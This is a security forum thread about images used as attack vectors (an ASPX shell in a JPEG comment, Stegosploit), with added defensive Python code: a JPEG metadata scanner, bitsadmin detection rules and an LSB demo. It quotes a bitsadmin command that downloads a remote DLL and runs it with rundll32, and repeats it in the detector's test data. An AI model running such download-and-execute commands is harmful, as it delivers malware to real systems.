I've checked only the beginning. He updates the attributes of a JPEG file (using the comment field) and puts active content (an ASPX shell) in it. Then he renames the .jpg to .aspx and uploads it. The server accepts it. When the modified picture is viewed, the shell executes. After that I guess it's game over.
Didn't see the video. @Minimalist, from your description this is an IIS problem? Sounds almost in the same vein as Shellshock, really. BTW, not sure the domain controller would dependably allow file uploads? I know very little about AD and LDAP on Windows. That said, environments where Linux or UNIX servers are administered from poorly secured Windows workstations tend to give me the willies...
From what I've seen at the beginning I can't tell if the problem is in IIS, ASP or a problematic function/program. It's also only the first step in the exploit chain, and the shell runs under user rights.
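For anyone who wants to check uploads for the trick described in the two posts above, here is an added example (my own code, not from the thread or from the demo it discusses): a JPEG marker walker that inspects the metadata segments an attacker can edit freely (COM and APPn) for server-side script tags, plus the extension-versus-magic check that would have rejected a .jpg renamed to .aspx. The two sample files are constructed inline and the "shell" is an inert placeholder tag, not a working web shell.

```python
"""
Added example, not from the thread or the demo it discusses: walk the marker
segments of a JPEG and flag server-side script tags stored in the editable
metadata segments (COM, APPn), and check that the claimed extension matches
the bytes actually uploaded. Sample files are constructed below; the "shell"
is an inert placeholder.
"""
import struct

SOI, EOI, SOS, COM = 0xD8, 0xD9, 0xDA, 0xFE
APP_MARKERS = range(0xE0, 0xF0)                          # APP0..APP15 (JFIF, EXIF, XMP, ...)
STANDALONE = set(range(0xD0, 0xD8)) | {SOI, EOI, 0x01}  # markers that carry no length field

# Tags that introduce ASP/ASPX/PHP active content; none belong in image metadata.
ACTIVE_CONTENT_SIGNATURES = (b"<%", b"<script runat=", b"<?php")


def iter_segments(data: bytes):
    """Yield (marker, payload) for each segment from SOI up to and including SOS."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        while pos + 1 < len(data) and data[pos + 1] == 0xFF:  # skip 0xFF fill bytes
            pos += 1
        if pos + 1 >= len(data):
            raise ValueError("truncated marker")
        marker = data[pos + 1]
        pos += 2
        if marker in STANDALONE:
            yield marker, b""
            if marker == EOI:
                return
            continue
        (length,) = struct.unpack(">H", data[pos:pos + 2])  # length includes its own 2 bytes
        yield marker, data[pos + 2:pos + length]
        pos += length
        if marker == SOS:
            return  # entropy-coded scan data follows; all metadata segments are behind us


def find_active_content(data: bytes):
    """Return [(segment_name, signature, snippet)] for editable segments holding script tags."""
    hits = []
    for marker, payload in iter_segments(data):
        if marker != COM and marker not in APP_MARKERS:
            continue
        for sig in ACTIVE_CONTENT_SIGNATURES:
            idx = payload.find(sig)
            if idx != -1:
                name = "COM" if marker == COM else f"APP{marker - 0xE0}"
                hits.append((name, sig.decode(), payload[idx:idx + 40].decode("latin-1")))
                break
    return hits


def extension_matches_magic(filename: str, data: bytes) -> bool:
    """Accept only names ending in .jpg/.jpeg whose bytes really start like a JPEG."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in ("jpg", "jpeg") and data[:3] == b"\xff\xd8\xff"


def build_jpeg_with_comment(comment: bytes) -> bytes:
    """Construct a minimal JPEG (SOI, COM, empty SOS, EOI) for the demo; not a real image."""
    com = b"\xff\xfe" + struct.pack(">H", len(comment) + 2) + comment
    sos = b"\xff\xda" + struct.pack(">H", 2)  # degenerate SOS: length field only
    return b"\xff\xd8" + com + sos + b"\xff\xd9"


BENIGN_JPG = build_jpeg_with_comment(b"Created with a camera")
# Placeholder tag in the comment field, standing in for the ASPX shell in the demo.
SHELL_IN_COMMENT = build_jpeg_with_comment(
    b'<%@ Page Language="C#" %><% Response.Write("placeholder"); %>')

if __name__ == "__main__":
    for name, blob in (("photo.jpg", BENIGN_JPG), ("photo.aspx", SHELL_IN_COMMENT)):
        print(name, "| extension matches magic:", extension_matches_magic(name, blob),
              "| active content:", find_active_content(blob))
```

The walker stops at SOS on purpose: the segments before it are the only place a comment-field editor writes, and stopping there keeps the check cheap on large files. A real upload handler should apply both checks and also store the file under a server-chosen name and extension rather than the one the client supplied.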
Regarding malicious JPEGs, does anyone remember this? http://web.archive.org/web/20050830222224/http://www.diamondcs.com.au/jpegscan/
Yes, I remember this! There was a long thread at DSLR where Wayne (owner of DiamondCS) demonstrated the technique of modifying a JPEG file. That exploit's payload was a file written to disk, which was an easy block for those who had such protection. I'm not sure exactly what is going on in this current exploit. Well, we don't know if this is always true or not: what other types of protection does the network have? (DiamondCS was a company ahead of its time in many ways. ProcessGuard and WormGuard were wonderful products -- some still use ProcessGuard. I was evaluating different anti-executable products at that time, and was impressed with ProcessGuard.) ---- rich
A short time ago, in another thread that asked about file types that can be used maliciously (too lazy to find it ATM), someone mentioned that many of those were not issues on up-to-date systems. Yet here we are again with file types one would assume to be safe being used as attack vectors.
Inspired by Marcus Murray's presentation (https://vimeo.com/103938583), security researcher and developer of Bouncer Florian Rienhardt has written a follow-up on his blog which includes an adaptation of the presented method; he was able to use Microsoft's built-in bitsadmin.exe to achieve similar execution of malicious downloads.
Blog: http://bitnuts.de/
Research on bitsadmin.exe: "Microsoft's built in Malware Dropper?", 2015/05/21, by Flo
Code:
cmd.exe /c bitsadmin /transfer transaction /download /priority HIGH hxxp://xx.xx.xx.xx/Injected.dll %temp%\a.dll >NUL & rundll32 %temp%\a.dll,0
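The drop-and-run one-liner above is easy to write a detection for, so here is an added example (my own code, not from bitnuts.de or this thread): rules that run over process-creation records in the shape of Sysmon Event ID 1 (image plus command line) and correlate a BITS download into a user-writable path with a later rundll32 load of the same file. The records, the 203.0.113.5 host, the wsus.corp.example host and the user paths are all made up for the demo.

```python
"""
Added example, not from bitnuts.de or this thread: detection logic for the
bitsadmin drop-and-run pattern, run over constructed process-creation records
(Sysmon Event ID 1 style). All hosts, users and paths below are invented.
"""
import re

# Constructed telemetry: one malicious chain (ts 1-3) and two benign uses (ts 4-5).
EVENTS = [
    {"ts": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c bitsadmin /transfer transaction /download /priority HIGH "
                r"http://203.0.113.5/Injected.dll %temp%\a.dll >NUL & rundll32 %temp%\a.dll,0"},
    {"ts": 2, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer transaction /download /priority HIGH "
                r"http://203.0.113.5/Injected.dll C:\Users\bob\AppData\Local\Temp\a.dll"},
    {"ts": 3, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32 C:\Users\bob\AppData\Local\Temp\a.dll,0"},
    {"ts": 4, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer wsus /download /priority NORMAL "
                r"http://wsus.corp.example/update.cab C:\ProgramData\Updates\update.cab"},
    {"ts": 5, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32 shell32.dll,Control_RunDLL"},
]

# bitsadmin /transfer <job> [flags] <remote URL> <local file>
BITS_DOWNLOAD = re.compile(r"bitsadmin(?:\.exe)?\s+/transfer\b.*?(https?://\S+)\s+(\S+)", re.I)
# rundll32 <dll>[,<entry point or ordinal>]
RUNDLL = re.compile(r"rundll32(?:\.exe)?\s+([^\s,]+)(?:,(\S+))?", re.I)
# Locations a non-admin user can write to; %temp% appears unexpanded in the parent's cmd line.
USER_WRITABLE = re.compile(r"%temp%|%appdata%|\\appdata\\|\\users\\public\\", re.I)


def normalise(path: str) -> str:
    """Map %temp% and the expanded per-user temp dir to one form so events can be joined."""
    p = path.strip('"').lower()
    p = re.sub(r"^.*\\appdata\\local\\temp\\", lambda _: "<temp>\\", p)
    return p.replace("%temp%\\", "<temp>\\")


def detect(events):
    """Return alerts as (ts, rule, detail); later rundll32 loads are joined to earlier drops."""
    alerts, dropped = [], {}
    for ev in events:
        cl = ev["cmdline"]
        low = cl.lower()
        if "bitsadmin" in low and "rundll32" in low:
            alerts.append((ev["ts"], "bitsadmin download chained with rundll32 in one command", cl))
        m = BITS_DOWNLOAD.search(cl)
        if m:
            url, dest = m.groups()
            if USER_WRITABLE.search(dest):
                alerts.append((ev["ts"], "bitsadmin download to user-writable path", f"{url} -> {dest}"))
                dropped[normalise(dest)] = ev["ts"]
        m = RUNDLL.search(cl)
        if m:
            dll, entry = m.group(1), m.group(2) or ""
            key = normalise(dll)
            if key in dropped:
                alerts.append((ev["ts"], "rundll32 loaded a BITS-dropped DLL",
                               f"{dll},{entry} (dropped at ts {dropped[key]})"))
            elif USER_WRITABLE.search(dll) and entry.isdigit():
                alerts.append((ev["ts"], "rundll32 ordinal call into DLL in user-writable path",
                               f"{dll},{entry}"))
    return alerts


if __name__ == "__main__":
    for ts, rule, detail in detect(EVENTS):
        print(f"ts={ts} {rule}: {detail}")
```

The benign WSUS-style job at ts 4 is left alone because it lands in ProgramData rather than a per-user directory; tighten or loosen USER_WRITABLE to taste. The join on the normalised destination path is what separates this from a plain "bitsadmin was run" rule, which fires constantly on real fleets.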
Stegosploit hides malicious code in images; this is the future of online attacks: http://securityaffairs.co/wordpress/37302/hacking/stegosploit-malware-images.html
NoScript et al. could potentially work against that, due to the first-stage JS needed to load the code embedded in the image. Also, it still has to deliver an effective exploit, including a sandbox escape in the case of Chrome or IE. It'd be a heck of a vehicle for delivering the actual attack, though.
Saumil Shah has said: http://www.net-security.org/secworld.php?id=18443 http://motherboard.vice.com/read/how-you-can-get-hacked-just-by-looking-at-a-picture-online and of course those words can scare... but I found the text on the blog below and I think it lowers the "charm" of Stegosploit: https://medium.com/@christianbundy/why-stegosploit-isn-t-an-exploit-189b0b5261eb Is it a real danger or only the researcher's mistake? BTW, below is the author's presentation: http://conference.hitb.org/hitbsecc...il-Shah-Stegosploit-Hacking-with-Pictures.pdf
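To make the point in the last three posts concrete, here is an added example (my own code, not from Saumil Shah's talk, the Medium post or this thread) of the generic least-significant-bit embedding that image-borne payload delivery relies on. The carrier is a constructed array of pixel bytes, the payload is an inert stand-in for a script, and the only function that does anything is extract_lsb(), the decoder stage that in the browser would be the first-stage JavaScript a script blocker stops. This is the general LSB technique, not necessarily the exact bit-plane encoder used in the Stegosploit toolkit.

```python
"""
Added example, not from the Stegosploit talk or this thread: generic LSB
embedding into a constructed pixel byte array. The carrier bytes are inert;
only the decoder stage (extract_lsb) turns them back into the payload.
"""
import random

HEADER_BYTES = 4  # big-endian length prefix stored ahead of the payload


def capacity(pixels: bytes) -> int:
    """Payload bytes that fit in the carrier at one bit per carrier byte."""
    return len(pixels) // 8 - HEADER_BYTES


def fits(pixels: bytes, payload: bytes) -> bool:
    return len(payload) <= capacity(pixels)


def embed_lsb(pixels: bytes, payload: bytes) -> bytearray:
    """Write len(payload) + payload, MSB first, into the LSB of successive carrier bytes."""
    if not fits(pixels, payload):
        raise ValueError(f"payload of {len(payload)} bytes exceeds capacity {capacity(pixels)}")
    out = bytearray(pixels)
    framed = len(payload).to_bytes(HEADER_BYTES, "big") + payload
    for i, byte in enumerate(framed):
        for bit in range(8):
            idx = i * 8 + bit
            out[idx] = (out[idx] & 0xFE) | ((byte >> (7 - bit)) & 1)
    return out


def extract_lsb(pixels: bytes) -> bytes:
    """Rebuild the framed payload from the LSBs; this is the decoder stage."""
    def read(n_bytes: int, offset: int) -> bytes:
        value = bytearray()
        for i in range(n_bytes):
            byte = 0
            for bit in range(8):
                byte = (byte << 1) | (pixels[offset + i * 8 + bit] & 1)
            value.append(byte)
        return bytes(value)
    length = int.from_bytes(read(HEADER_BYTES, 0), "big")
    if length > capacity(pixels):
        raise ValueError("length prefix exceeds carrier: not a stego carrier, or corrupted")
    return read(length, HEADER_BYTES * 8)


def decodes_to(pixels: bytes, payload: bytes) -> bool:
    """True only if the decoder recovers exactly this payload from the carrier."""
    try:
        return extract_lsb(pixels) == payload
    except ValueError:
        return False


def max_pixel_delta(a: bytes, b: bytes) -> int:
    return max(abs(x - y) for x, y in zip(a, b))


# Constructed carrier: a 64x64 grayscale "image" filled with deterministic noise.
CARRIER = bytes(random.Random(1).randrange(256) for _ in range(64 * 64))
PAYLOAD = b"alert('decoder stage ran');"  # inert stand-in for a first-stage script

if __name__ == "__main__":
    stego = embed_lsb(CARRIER, PAYLOAD)
    print("max per-pixel change:", max_pixel_delta(CARRIER, stego))  # LSB only, so at most 1
    print("recovered from stego carrier:", extract_lsb(stego))
    print("plain carrier yields the payload:", decodes_to(CARRIER, PAYLOAD))
```

Nothing in embed_lsb() changes a pixel by more than one level, which is why the carrier survives casual inspection; equally, nothing in the carrier executes until something runs extract_lsb() and feeds the result to an interpreter, which is the part the Medium post says is the real exploit and the part NoScript-style blocking removes. A lossy re-encode of the carrier on upload (the usual image-hosting behaviour) destroys the LSB channel, so a hosting pipeline that recompresses every image is a cheap mitigation against this particular encoder.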